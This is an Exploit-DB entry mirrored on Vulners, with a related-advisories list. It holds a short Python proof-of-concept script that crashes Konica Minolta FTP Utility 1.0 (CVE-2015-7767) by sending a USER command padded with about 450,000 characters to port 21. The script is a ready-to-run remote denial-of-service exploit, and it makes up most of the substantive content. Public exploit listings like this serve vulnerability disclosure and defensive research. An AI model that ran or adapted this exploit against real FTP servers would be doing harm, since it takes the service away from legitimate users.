Lucene search
+L

Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)

🗓️ 21 Aug 2015 00:00:00Reported by Shankar DamodaranType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 79 Views

Konica Minolta FTP Utility 1.0 - Remote Denial of Service # Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC # Date: 21-08-2015 # Exploit Author: Shankar Damodaran # Vendor Homepage: http://www.konicaminolta.com/ # Version: 1.0 # Tested on: Microsoft Windows XP Professional SP3 English

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2015-7767
21 Aug 201500:00
circl
cnvd
CNVD
Konica Minolta FTP Utility Denial of Service Vulnerability
13 Oct 201500:00
cnvd
cve
CVE
CVE-2015-7767
9 Oct 201514:00
cve
cvelist
Cvelist
CVE-2015-7767
9 Oct 201514:00
cvelist
exploitdb
Exploit DB
Konica Minolta FTP Utility 1.0 - Remote Command Execution
20 Sep 201500:00
exploitdb
euvd
EUVD
EUVD-2015-7666
7 Oct 202500:30
euvd
nvd
NVD
CVE-2015-7767
9 Oct 201514:59
nvd
openvas
OpenVAS
Konica Minolta FTP Utility 1.0 Multiple Vulnerabilities - Active Check
28 Sep 201500:00
openvas
prion
Prion
Buffer overflow
9 Oct 201514:59
prion
redhatcve
RedhatCVE
CVE-2015-7767
22 May 202506:27
redhatcve
#!/usr/bin/python
# Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC
# Date: 21-08-2015
# Exploit Author: Shankar Damodaran
# Vendor Homepage: http://www.konicaminolta.com/
# Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Version: 1.0
# Tested on: Microsoft Windows XP Professional SP3 English


import socket

# The ip address of the remote host
ftphost = '192.168.1.7'
# The port of the remote host
ftpport = 21

# Fuzzed packet of a certain length, Appending this to the USER command and requesting the remote ftp server denies requests for other legitimate users.
crafted_user_name= "B" * 450012   # DoS

# Establishing connection
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ftphost,ftpport))
s.recv(1024)

# Sending the evil input.
s.send('USER' + crafted_user_name +'\r\n')

# Once the packet has been sent, the DoS will occur on the remote FTP server. By sending an interrupt through (Ctrl+C), will resume the FTP server from DoS. (Note : The FTP server will not get crashed)
s.send('QUIT \r\n')
s.close()

# End of PoC - Shankar Damodaran

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation